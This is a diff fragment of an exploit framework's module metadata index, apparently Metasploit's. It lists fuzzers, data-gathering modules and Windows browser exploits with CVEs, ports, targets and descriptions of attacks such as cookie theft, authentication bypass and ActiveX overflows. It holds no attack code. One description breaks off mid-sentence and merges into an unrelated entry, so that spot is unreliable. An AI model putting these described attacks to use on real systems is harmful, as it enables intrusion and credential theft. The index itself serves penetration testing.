+ "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of SMB create pipe\n requests using malicious strings.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb", + "is_install_path": true, + "ref_name": "fuzzers/smb/smb_create_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/smb/smb_create_pipe_corrupt": { + "name": "SMB Create Pipe Request Corruption", + "fullname": "auxiliary/fuzzers/smb/smb_create_pipe_corrupt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of SMB create pipe requests with corrupted bytes.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2020-05-13 16:34:47 +0000", + "path": "/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb", + "is_install_path": true, + "ref_name": "fuzzers/smb/smb_create_pipe_corrupt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/smb/smb_negotiate_corrupt": { + "name": "SMB Negotiate Dialect Corruption", + "fullname": "auxiliary/fuzzers/smb/smb_negotiate_corrupt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of SMB negotiate requests with corrupted 
bytes", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-08-24 21:38:44 +0000", + "path": "/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb", + "is_install_path": true, + "ref_name": "fuzzers/smb/smb_negotiate_corrupt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/smb/smb_ntlm1_login_corrupt": { + "name": "SMB NTLMv1 Login Request Corruption", + "fullname": "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of SMB login requests using\n the NTLMv1 protocol with corrupted bytes.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2020-05-07 20:22:56 +0000", + "path": "/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb", + "is_install_path": true, + "ref_name": "fuzzers/smb/smb_ntlm1_login_corrupt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/smb/smb_tree_connect": { + "name": "SMB Tree Connect Request Fuzzer", + "fullname": "auxiliary/fuzzers/smb/smb_tree_connect", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of SMB tree connect\n requests using malicious strings.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + 
"mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb", + "is_install_path": true, + "ref_name": "fuzzers/smb/smb_tree_connect", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/smb/smb_tree_connect_corrupt": { + "name": "SMB Tree Connect Request Corruption", + "fullname": "auxiliary/fuzzers/smb/smb_tree_connect_corrupt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of SMB tree connect requests with corrupted bytes.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2020-05-13 16:34:47 +0000", + "path": "/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb", + "is_install_path": true, + "ref_name": "fuzzers/smb/smb_tree_connect_corrupt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/smtp/smtp_fuzzer": { + "name": "SMTP Simple Fuzzer", + "fullname": "auxiliary/fuzzers/smtp/smtp_fuzzer", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "justme" + ], + "description": "SMTP Simple Fuzzer", + "references": [ + "URL-http://www.ietf.org/rfc/rfc2821.txt" + ], + "platform": "", + "arch": "", + "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb", + "is_install_path": true, + "ref_name": "fuzzers/smtp/smtp_fuzzer", + "check": false, + 
"post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/ssh/ssh_kexinit_corrupt": { + "name": "SSH Key Exchange Init Corruption", + "fullname": "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of SSH requests with a corrupted initial key exchange payload.", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb", + "is_install_path": true, + "ref_name": "fuzzers/ssh/ssh_kexinit_corrupt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/ssh/ssh_version_15": { + "name": "SSH 1.5 Version Fuzzer", + "fullname": "auxiliary/fuzzers/ssh/ssh_version_15", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of SSH requests with malicious version strings.", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb", + "is_install_path": true, + "ref_name": "fuzzers/ssh/ssh_version_15", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/ssh/ssh_version_2": { + "name": "SSH 2.0 Version Fuzzer", + "fullname": "auxiliary/fuzzers/ssh/ssh_version_2", + "aliases": [], + "rank": 300, + "disclosure_date": 
null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of SSH requests with malicious version strings.", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb", + "is_install_path": true, + "ref_name": "fuzzers/ssh/ssh_version_2", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/ssh/ssh_version_corrupt": { + "name": "SSH Version Corruption", + "fullname": "auxiliary/fuzzers/ssh/ssh_version_corrupt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of SSH requests with a corrupted version string", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb", + "is_install_path": true, + "ref_name": "fuzzers/ssh/ssh_version_corrupt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/tds/tds_login_corrupt": { + "name": "TDS Protocol Login Request Corruption Fuzzer", + "fullname": "auxiliary/fuzzers/tds/tds_login_corrupt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of malformed TDS login requests.", + "references": [], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + 
"ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb", + "is_install_path": true, + "ref_name": "fuzzers/tds/tds_login_corrupt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/tds/tds_login_username": { + "name": "TDS Protocol Login Request Username Fuzzer", + "fullname": "auxiliary/fuzzers/tds/tds_login_username", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of malformed TDS login requests.", + "references": [], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/fuzzers/tds/tds_login_username.rb", + "is_install_path": true, + "ref_name": "fuzzers/tds/tds_login_username", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_gather/acronis_cyber_protect_machine_info_disclosure": { + "name": "Acronis Cyber Protect/Backup machine info disclosure", + "fullname": "auxiliary/gather/acronis_cyber_protect_machine_info_disclosure", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die-gr3y ", + "Sandro Tolksdorf of usd AG." + ], + "description": "Acronis Cyber Protect or Backup is an enterprise backup/recovery solution for all,\n compute, storage and application resources. 
Businesses and Service Providers are using it\n to protect and backup all IT assets in their IT environment.\n This module exploits an authentication bypass vulnerability at the Acronis Cyber Protect\n appliance which, in its default configuration, allows the anonymous registration of new\n backup/protection agents on new endpoints. This API endpoint also generates bearer tokens\n which the agent then uses to authenticate to the appliance.\n As the management web console is running on the same port as the API for the agents, this\n bearer token is also valid for any actions on the web console. This allows an attacker\n with network access to the appliance to start the registration of a new agent, retrieve\n a bearer token that provides admin access to the available functions in the web console.\n\n This module will gather all machine info (endpoints) configured and managed by the appliance.\n This information can be used in a subsequent attack that exploits this vulnerability to\n execute arbitrary commands on both the managed endpoint and the appliance.\n This exploit is covered in another module `exploit/multi/acronis_cyber_protect_unauth_rce_cve_2022_3405`.\n\n Acronis Cyber Protect 15 (Windows, Linux) before build 29486 and\n Acronis Cyber Backup 12.5 (Windows, Linux) before build 16545 are vulnerable.", + "references": [ + "CVE-2022-30995", + "CVE-2022-3405", + "URL-https://herolab.usd.de/security-advisories/usd-2022-0008/", + "URL-https://attackerkb.com/topics/27RudJXbN4/cve-2022-30995" + ], + "platform": "", + "arch": "", + "rport": 9877, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-11-26 16:10:14 +0000", + "path": "/modules/auxiliary/gather/acronis_cyber_protect_machine_info_disclosure.rb", + "is_install_path": true, + "ref_name": "gather/acronis_cyber_protect_machine_info_disclosure", + "check": true, + "post_auth": 
false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_gather/adobe_coldfusion_fileread_cve_2023_26360": { + "name": "Adobe ColdFusion Unauthenticated Arbitrary File Read", + "fullname": "auxiliary/gather/adobe_coldfusion_fileread_cve_2023_26360", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "sf " + ], + "description": "This module exploits a remote unauthenticated deserialization of untrusted data vulnerability in Adobe\n ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier, in order to read\n an arbitrary file from the server.\n\n To run this module you must provide a valid ColdFusion Component (CFC) endpoint via the CFC_ENDPOINT option,\n and a valid remote method name from that endpoint via the CFC_METHOD option. By default an endpoint in the\n ColdFusion Administrator (CFIDE) is provided. 
If the CFIDE is not accessible you will need to choose a\n different CFC endpoint, method and parameters.", + "references": [ + "CVE-2023-26360", + "URL-https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis" + ], + "platform": "", + "arch": "", + "rport": 8500, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/gather/adobe_coldfusion_fileread_cve_2023_26360.rb", + "is_install_path": true, + "ref_name": "gather/adobe_coldfusion_fileread_cve_2023_26360", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_gather/advantech_webaccess_creds": { + "name": "Advantech WebAccess 8.1 Post Authentication Credential Collector", + "fullname": "auxiliary/gather/advantech_webaccess_creds", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-01-21", + "type": "auxiliary", + "author": [ + "h00die", + "sinn3r " + ], + "description": "This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.\n Although authentication is required, any level of user permission can exploit this vulnerability.\n\n Note that 8.2 is not suitable for this.", + "references": [ + "CVE-2016-5810", + "URL-https://github.com/rapid7/metasploit-framework/pull/7859#issuecomment-274305229" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/gather/advantech_webaccess_creds.rb", + 
"is_install_path": true, + "ref_name": "gather/advantech_webaccess_creds", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_gather/alienvault_iso27001_sqli": { + "name": "AlienVault Authenticated SQL Injection Arbitrary File Read", + "fullname": "auxiliary/gather/alienvault_iso27001_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-03-30", + "type": "auxiliary", + "author": [ + "Brandon Perry " + ], + "description": "AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG\n generation PHP file. This module exploits this to read an arbitrary file from\n the file system. Any authenticated user is able to exploit it, as administrator\n privileges aren't required.", + "references": [ + "EDB-32644" + ], + "platform": "Linux", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/gather/alienvault_iso27001_sqli.rb", + "is_install_path": true, + "ref_name": "gather/alienvault_iso27001_sqli", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_gather/alienvault_newpolicyform_sqli": { + "name": "AlienVault Authenticated SQL Injection Arbitrary File Read", + "fullname": "auxiliary/gather/alienvault_newpolicyform_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-05-09", + "type": "auxiliary", + "author": [ + "Chris Hebert " + ], + "description": "AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against\n newpolicyform.php, using the 'insertinto' parameter. 
This module exploits the vulnerability\n to read an arbitrary file from the file system. Any authenticated user is able to exploit\n this, as administrator privileges are not required.", + "references": [ + "CVE-2014-5383", + "OSVDB-106815", + "EDB-33317", + "URL-http://forums.alienvault.com/discussion/2690/security-advisories-v4-6-1-and-lower" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb", + "is_install_path": true, + "ref_name": "gather/alienvault_newpolicyform_sqli", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_gather/android_browser_file_theft": { + "name": "Android Browser File Theft", + "fullname": "auxiliary/gather/android_browser_file_theft", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Rafay Baloch", + "joev " + ], + "description": "This module steals the cookie, password, and autofill databases from the\n Browser application on AOSP 4.3 and below.", + "references": [ + "URL-https://android.googlesource.com/platform/packages/apps/Browser/+/d2391b492dec778452238bc6d9d549d56d41c107%5E%21/#F0", + "URL-https://bugs.chromium.org/p/chromium/issues/detail?id=90222" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/gather/android_browser_file_theft.rb", + "is_install_path": true, + "ref_name": "gather/android_browser_file_theft", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + 
"needs_cleanup": false, + "actions": [ + { + "name": "WebServer", + "description": "Serve exploit via web server" + } + ] + }, + "auxiliary_gather/android_browser_new_tab_cookie_theft": { + "name": "Android Browser \"Open in New Tab\" Cookie Theft", + "fullname": "auxiliary/gather/android_browser_new_tab_cookie_theft", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Rafay Baloch", + "joev " + ], + "description": "In Android's stock AOSP Browser application and WebView component, the\n \"open in new tab\" functionality allows a file URL to be opened. On\n versions of Android before 4.4, the path to the sqlite cookie\n database could be specified. By saving a cookie containing a .\n\n IE Tabs, WScript and subsequent Powershell prompts all run as x86 even when run from\n an x64 iexplore.exe.\n\n By default, this module will not attempt to fire against IEs that come with Protected\n Mode enabled by default, because it can trigger a security prompt. 
However, if you are\n feeling brave, you can choose to ignore this restriction by setting the ALLOWPROMPT\n datastore option to true.", + "references": [ + "URL-http://support.microsoft.com/kb/182569", + "URL-http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html", + "URL-http://support.microsoft.com/kb/870669" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86/x64" + ], + "mod_time": "2021-01-13 11:06:01 +0000", + "path": "/modules/exploits/windows/browser/ie_unsafe_scripting.rb", + "is_install_path": true, + "ref_name": "windows/browser/ie_unsafe_scripting", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/imgeviewer_tifmergemultifiles": { + "name": "Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control", + "fullname": "exploit/windows/browser/imgeviewer_tifmergemultifiles", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-03-03", + "type": "exploit", + "author": [ + "Dr_IDE", + "TecR0c ", + "mr_me " + ], + "description": "This module exploits a stack based buffer overflow in the Active control file\n ImageViewer2.OCX by passing an overly long argument to an insecure TifMergeMultiFiles()\n method. 
Exploitation results in code execution with the privileges of the user who\n browsed to the exploit page.\n\n The victim will first be required to trust the publisher Viscom Software.\n This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7\n with Java support.", + "references": [ + "CVE-2010-5193", + "OSVDB-78102", + "EDB-15668", + "URL-http://web.archive.org/web/20101204093821/http://secunia.com:80/advisories/42445", + "URL-http://xforce.iss.net/xforce/xfdb/63666" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Internet Explorer 6/7", + "Internet Explorer 8 with JRE" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb", + "is_install_path": true, + "ref_name": "windows/browser/imgeviewer_tifmergemultifiles", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/indusoft_issymbol_internationalseparator": { + "name": "InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow", + "fullname": "exploit/windows/browser/indusoft_issymbol_internationalseparator", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-04-28", + "type": "exploit", + "author": [ + "Alexander Gavrun", + "Dmitriy Pletnev", + "James Fitts ", + "juan vazquez " + ], + "description": "This module exploits a heap overflow found in InduSoft Web Studio <= 61.6.00.00\n SP6. 
The overflow exists in the ISSymbol.ocx, and can be triggered with a long\n string argument for the InternationalSeparator() method of the ISSymbol control.\n This module uses the msvcr71.dll form the Java JRE6 to bypass ASLR.", + "references": [ + "CVE-2011-0340", + "OSVDB-72865", + "BID-47596", + "ZDI-12-168", + "URL-http://web.archive.org/web/20110506063846/http://secunia.com:80/secunia_research/2011-37" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3", + "IE 8 on Windows XP SP3", + "IE 7 on Windows Vista", + "IE 8 on Windows Vista", + "IE 8 on Windows 7", + "IE 9 on Windows 7" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb", + "is_install_path": true, + "ref_name": "windows/browser/indusoft_issymbol_internationalseparator", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/inotes_dwa85w_bof": { + "name": "IBM Lotus iNotes dwa85W ActiveX Buffer Overflow", + "fullname": "exploit/windows/browser/inotes_dwa85w_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-06-01", + "type": "exploit", + "author": [ + "Gaurav Baruah", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow vulnerability on the UploadControl\n ActiveX. The vulnerability exists in the handling of the \"Attachment_Times\"\n property, due to the insecure usage of the _swscanf. 
The affected ActiveX is\n provided by the dwa85W.dll installed with the IBM Lotus iNotes ActiveX installer.\n\n This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7,\n using the dwa85W.dll 85.3.3.0 as installed with Lotus Domino 8.5.3.\n\n In order to bypass ASLR the no aslr compatible module dwabho.dll is used. This one\n is installed with the iNotes ActiveX.", + "references": [ + "CVE-2012-2175", + "OSVDB-82755", + "BID-53879", + "ZDI-12-132", + "URL-http://www-304.ibm.com/support/docview.wss?uid=swg21596862" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3", + "IE 8 on Windows XP SP3", + "IE 7 on Windows Vista", + "IE 8 on Windows Vista", + "IE 8 on Windows 7", + "IE 9 on Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/inotes_dwa85w_bof.rb", + "is_install_path": true, + "ref_name": "windows/browser/inotes_dwa85w_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/intrust_annotatex_add": { + "name": "Quest InTrust Annotation Objects Uninitialized Pointer", + "fullname": "exploit/windows/browser/intrust_annotatex_add", + "aliases": [], + "rank": 200, + "disclosure_date": "2012-03-28", + "type": "exploit", + "author": [ + "rgod ", + "mr_me " + ], + "description": "This module exploits an uninitialized variable vulnerability in the\n Annotation Objects ActiveX component. The ActiveX component loads into memory without\n opting into ALSR so this module exploits the vulnerability against windows Vista and\n Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX\n points to part of the ROP chain in a heap chunk and the calculated call will hit the\n pivot in a separate heap chunk. 
This will take some time in the users browser.", + "references": [ + "CVE-2012-5896", + "OSVDB-80662", + "BID-52765", + "EDB-18674" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP/Vista SP0-SP3 (IE6/IE7)", + "Windows XP SP0-SP3 DEP bypass (IE8)", + "Windows 7/Vista ALSR/DEP bypass (IE8)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/intrust_annotatex_add.rb", + "is_install_path": true, + "ref_name": "windows/browser/intrust_annotatex_add", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/java_basicservice_impl": { + "name": "Sun Java Web Start BasicServiceImpl Code Execution", + "fullname": "exploit/windows/browser/java_basicservice_impl", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "Matthias Kaiser", + "egypt " + ], + "description": "This module exploits a vulnerability in Java Runtime Environment\n that allows an attacker to escape the Java Sandbox. 
By injecting\n a parameter into a javaws call within the BasicServiceImpl class\n the default java sandbox policy file can be therefore overwritten.\n The vulnerability affects version 6 prior to update 22.\n\n NOTE: Exploiting this vulnerability causes several sinister-looking\n popup windows saying that Java is \"Downloading application.\"", + "references": [ + "CVE-2010-3563", + "OSVDB-69043", + "URL-http://mk41ser.blogspot.com" + ], + "platform": "Java,Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Generic (Java Payload)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/java_basicservice_impl.rb", + "is_install_path": true, + "ref_name": "windows/browser/java_basicservice_impl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/java_cmm": { + "name": "Java CMM Remote Code Execution", + "fullname": "exploit/windows/browser/java_cmm", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-03-01", + "type": "exploit", + "author": [ + "Unknown", + "juan vazquez " + ], + "description": "This module abuses the Color Management classes from a Java Applet to run\n arbitrary Java code outside of the sandbox as exploited in the wild in February\n and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41\n and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1\n systems. 
This exploit doesn't bypass click-to-play, so the user must accept the java\n warning in order to run the malicious applet.", + "references": [ + "CVE-2013-1493", + "OSVDB-90737", + "BID-58238", + "URL-https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493", + "URL-http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html", + "URL-http://web.archive.org/web/20161013042610/http://pastie.org/pastes/6581034" + ], + "platform": "Java,Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Generic (Java Payload)", + "Windows x86 (Native Payload)" + ], + "mod_time": "2025-02-07 12:36:11 +0000", + "path": "/modules/exploits/windows/browser/java_cmm.rb", + "is_install_path": true, + "ref_name": "windows/browser/java_cmm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/java_codebase_trust": { + "name": "Sun Java Applet2ClassLoader Remote Code Execution", + "fullname": "exploit/windows/browser/java_codebase_trust", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-02-15", + "type": "exploit", + "author": [ + "Frederic Hoguin", + "jduck " + ], + "description": "This module exploits a vulnerability in the Java Runtime Environment\n that allows an attacker to run an applet outside of the Java Sandbox. When\n an applet is invoked with:\n\n 1. A \"codebase\" parameter that points at a trusted directory\n 2. 
